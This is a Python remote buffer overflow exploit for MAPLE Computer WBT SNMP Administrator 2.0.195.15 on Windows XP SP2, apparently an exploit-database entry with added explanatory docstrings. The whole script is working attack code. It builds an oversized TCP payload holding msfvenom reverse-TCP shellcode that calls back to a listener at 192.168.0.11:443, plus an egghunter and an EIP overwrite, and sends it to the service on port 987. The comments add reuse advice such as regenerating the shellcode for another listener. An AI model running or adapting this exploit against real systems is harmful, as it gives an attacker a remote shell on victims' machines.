# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
# Author: sasaga92
# Discovery Date: 2019-07-18
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows XP SP2 x86
# CVE: N/A
# [+] Credits: John Page (aka hyp3rlinx)


#!/usr/bin/python

import sys
import socket
import random
import string
import struct



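def pattern_create(_type, _length):
    """Build a filler string of ``_length`` characters for the overflow buffer.

    ``_type`` is a one- or two-word spec, split on a single space:

    * ``"trash X"`` - ``_length`` copies of the single character ``X``
      (plain padding; this is what ``main`` uses for the A/B fillers).
    * ``"random"``  - ``_length`` random lowercase ASCII letters.  Uses the
      non-cryptographic ``random`` module, which is fine for filler but
      must never be reused for anything secret.
    * ``"pattern"`` - a Metasploit-style cyclic pattern ``Aa0Aa1Aa2...``
      (uppercase, lowercase, digit triplets).  As with msf's
      pattern_create, a 4-byte value read out of EIP maps back to a unique
      offset within the first 20280 bytes.

    Returns the filler string; ``_length`` <= 0 yields ``""`` for every
    kind (the original looped forever on a negative length for
    ``"pattern"``).

    Raises ``ValueError`` for an unknown spec, or a ``"trash"`` spec without
    its fill character, instead of silently returning the literal text
    ``"Not Found"`` as if it were padding.
    """
    words = _type.split(" ")
    kind = words[0]

    if kind == "trash":
        if len(words) < 2:
            raise ValueError("trash spec needs a fill character, e.g. 'trash A'")
        # str * negative == "" already, so no extra guard is needed here.
        return words[1] * _length

    if kind == "random":
        # ascii_lowercase exists on both Python 2 and 3 (string.lowercase is 2.x only).
        return ''.join(random.choice(string.ascii_lowercase) for _ in range(_length))

    if kind == "pattern":
        if _length <= 0:
            return ''
        upper, lower, digit = 'A', 'a', '0'
        out = []
        # One character per iteration, cycling upper -> lower -> digit.  After
        # each completed triplet the digit rolls over, carrying into the
        # lowercase letter and then into the uppercase one.
        while len(out) < _length:
            pos = len(out) % 3
            out.append((upper, lower, digit)[pos])
            if pos == 2:
                digit = chr(ord(digit) + 1)
                if digit > '9':
                    digit = '0'
                    lower = chr(ord(lower) + 1)
                    if lower > 'z':
                        lower = 'a'
                        upper = chr(ord(upper) + 1)
                        if upper > 'Z':
                            upper = 'A'
        return ''.join(out)

    raise ValueError("unknown pattern type: {0!r}".format(kind))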

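def pwned(_host, _port, _payload, timeout=10.0):
    """Deliver ``_payload`` to the target service over one TCP connection.

    Connects to ``_host:_port``, sends the payload followed by a single
    trailing space (the delimiter the original script appended), waits up
    to ``timeout`` seconds for a reply and prints whatever came back.

    A completed send proves only that the bytes left this host.  The
    service is expected to crash into the overwritten return address, so it
    may answer, reset the connection, or go silent; the closing status line
    must not be read as confirmation that the shellcode ran.  Confirm on
    the listener that receives the reverse-shell callback instead.

    ``timeout`` is new and optional (default 10 s): without it ``recv``
    blocks forever on a silent target.  ``socket.error`` from ``connect``
    propagates to the caller as before.
    """
    print("[*] Conectandose a {0}:{1}...".format(_host, _port))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((_host, _port))
        print("[*] Conectado, Enviando payload {0} bytes...".format(len(_payload)))
        wire = _payload + (b" " if isinstance(_payload, bytes) else " ")
        if not isinstance(wire, bytes):
            # Python 3 str payload: latin-1 maps every \xNN escape to the
            # same single byte, so the wire image matches the 2.x str.
            wire = wire.encode("latin-1")
        # send() may push only part of a ~640 KiB buffer and return early;
        # sendall() loops until every byte is out.  Otherwise the EIP
        # overwrite sitting at the very end never reaches the target.
        sock.sendall(wire)
        try:
            data = sock.recv(1024)
            print("Recibido: {0!r}".format(data))
        except (socket.timeout, socket.error) as exc:
            # A crashed service typically resets the connection or never
            # answers; report that instead of hanging or tracing back.
            print("[!] Sin respuesta del servicio ({0})".format(exc))
        print("[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(wire)))
    finally:
        # The original wrote `s.shutdown` / `s.close` without parentheses,
        # which never called them; always release the socket here.
        try:
            sock.shutdown(socket.SHUT_RDWR)
        except socket.error:
            pass
        sock.close()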


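def main():
    """Build the overflow buffer for the WBT SNMP Administrator service and fire it.

    Target host/port default to the lab values below and may be overridden
    as ``argv[1]`` / ``argv[2]``.

    Buffer layout (byte offsets from the start of what is sent):

        0 ............ 'A' filler
        642144-8-len(shellcode) .. "w00tw00t" tag, then the shellcode
        (immediately after) ..... 32-byte egghunter
        (up to 642200) .......... 'B' filler
        642200 .................. EIP -> 0x5AD778C3 (call ebx)

    The return address is overwritten with a ``call ebx`` gadget, which the
    author chose because EBX points into attacker-controlled data at crash
    time; exactly where it lands is not recorded here, so re-verify it in a
    debugger before reusing the offsets.  The hunter then scans memory for
    the doubled ``w00t`` tag and jumps to the shellcode behind it.

    Notes a practitioner needs before reusing this:

    * All byte strings are written with ``\\x`` escapes; a copy that shows
      them as ``x89xe6...`` has lost the backslashes and will produce a
      buffer three times too long with EIP at the wrong offset.
    * 0x5AD778C3 is a module address from the XP SP2 test box (no module
      name was recorded); it is not portable to other builds.
    * The hunter uses ``int 0x2e`` with syscall 0x02
      (NtAccessCheckAndAuditAlarm on XP-era kernels); newer Windows needs
      a different syscall number/mechanism.
    * The shellcode is a *staged* ``windows/shell/reverse_tcp`` callback
      hard-wired to 192.168.0.11:443 and encoded with x86/alpha_mixed
      (see the msfvenom line).  Regenerate it for any other listener, and
      confirm the service's bad-character set first: the hunter and EIP
      bytes are raw, so whatever filtering motivated alpha_mixed is
      evidently not total.

    Raises ``ValueError`` if the pieces do not fit the recorded offsets
    (the original silently built a misaligned buffer in that case).
    """
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.12"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 987
    offset_eip = 642200      # bytes sent before the saved return address
    padding = 642144         # offset at which tag + shellcode must end
    eip = struct.pack("<I", 0x5AD778C3)   # call ebx, little-endian
    tag = b"w00tw00t"        # hunter compares two consecutive "w00t" dwords

    # msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
    shellcode = (b"\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
                 b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
                 b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
                 b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
                 b"\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"
                 b"\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"
                 b"\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"
                 b"\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"
                 b"\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"
                 b"\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"
                 b"\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"
                 b"\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"
                 b"\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"
                 b"\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"
                 b"\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"
                 b"\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"
                 b"\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"
                 b"\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"
                 b"\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"
                 b"\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"
                 b"\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"
                 b"\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"
                 b"\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"
                 b"\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"
                 b"\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"
                 b"\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"
                 b"\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"
                 b"\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"
                 b"\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"
                 b"\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"
                 b"\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"
                 b"\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"
                 b"\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"
                 b"\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"
                 b"\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"
                 b"\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"
                 b"\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"
                 b"\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"
                 b"\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"
                 b"\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"
                 b"\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"
                 b"\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"
                 b"\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"
                 b"\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"
                 b"\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"
                 b"\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"
                 b"\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"
                 b"\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"
                 b"\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"
                 b"\x70\x73\x63\x69\x6f\x59\x45\x41\x41")

    # skape-style egghunter: page through memory with `int 0x2e` / syscall
    # 0x02 (push 2; pop eax), `mov eax, "w00t"` (b8 77 30 30 74), two
    # scasd/jnz compares for the doubled tag, then `jmp edi` to the bytes
    # right after it.  32 bytes.
    egghunter = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
                 b"\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7"
                 b"\xff\xe7")

    lead = padding - len(tag) - len(shellcode)
    if lead < 0:
        raise ValueError("tag + shellcode ({0} bytes) exceed the {1}-byte padding region"
                         .format(len(tag) + len(shellcode), padding))

    # .encode("latin-1") is a no-op on a 2.x str and yields bytes on 3.x,
    # so the pieces concatenate under either interpreter.
    inject = pattern_create("trash A", lead).encode("latin-1")
    tag_at = len(inject)
    inject += tag
    shellcode_at = len(inject)
    inject += shellcode
    hunter_at = len(inject)
    inject += egghunter
    if len(inject) > offset_eip:
        raise ValueError("payload reaches {0} bytes, past the EIP offset {1}"
                         .format(len(inject), offset_eip))
    inject += pattern_create("trash B", offset_eip - len(inject)).encode("latin-1")
    inject += eip
    if len(inject) != offset_eip + len(eip):
        raise ValueError("buffer is {0} bytes, expected {1}"
                         .format(len(inject), offset_eip + len(eip)))

    # The original dumped the whole ~640 KiB buffer to stdout; a layout
    # summary is what is actually useful when re-checking offsets.
    print("[*] buffer {0} bytes: tag@{1} shellcode@{2} ({3} bytes) hunter@{4} EIP@{5}"
          .format(len(inject), tag_at, shellcode_at, len(shellcode), hunter_at, offset_eip))
    pwned(host, port, inject)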

# Entry point: only fire the exploit when run as a script, so the module can
# be imported (e.g. to reuse pattern_create) without touching the network.
if __name__ == "__main__":
    main()